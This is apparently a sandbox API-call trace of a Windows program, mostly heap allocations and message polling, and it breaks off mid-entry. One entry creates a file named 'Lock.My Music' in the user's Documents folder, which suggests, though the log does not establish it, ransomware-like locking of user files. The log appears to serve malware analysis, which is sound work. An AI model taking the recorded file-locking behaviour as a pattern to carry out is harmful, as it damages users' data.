1 [0218.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0218.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0218.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0218.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0218.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0218.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0218.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0218.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0218.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0218.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0218.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0218.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0218.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0218.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0218.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0218.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0218.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0218.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0218.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0218.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0218.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0218.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0218.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854740 [0218.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0218.027] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0218.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854740 | out: hHeap=0x2af0000) returned 1 [0218.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0218.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3855010 [0218.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0218.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0218.028] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.My Music" (normalized: "c:\\users\\fd1hvy\\documents\\lock.my music"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c [0218.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0218.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0218.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0218.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0218.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0218.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0218.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0218.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0218.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0218.029] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0218.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0218.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0218.029] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0218.029] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0218.029] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0218.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0218.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0218.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0218.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0218.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0218.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0218.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0218.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0218.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0218.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0218.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0218.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0218.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0218.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0218.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0218.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0218.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0218.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0218.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0218.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0218.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0218.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0218.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0218.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0218.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0218.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0218.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0218.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0218.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0218.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0218.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0218.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0218.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0218.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0218.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0218.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0218.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0218.031] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0218.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0218.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0218.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0218.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0218.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0218.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0218.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0218.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0218.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0218.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0218.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0218.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0218.032] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0218.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0218.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0218.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0218.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0218.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0218.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0218.032] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0218.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0218.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0218.032] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0218.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0218.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0218.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0218.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0218.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0218.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0218.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0218.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0218.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0218.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0218.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab218 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0218.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0218.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0218.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0218.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0218.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0218.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0218.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0218.035] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0218.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0218.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0218.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0218.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0218.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0218.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0218.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0218.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0218.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0218.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0218.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0218.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0218.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0218.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0218.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0218.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0218.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0218.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0218.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0218.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0218.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0218.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.037] RtlAllocateHeap 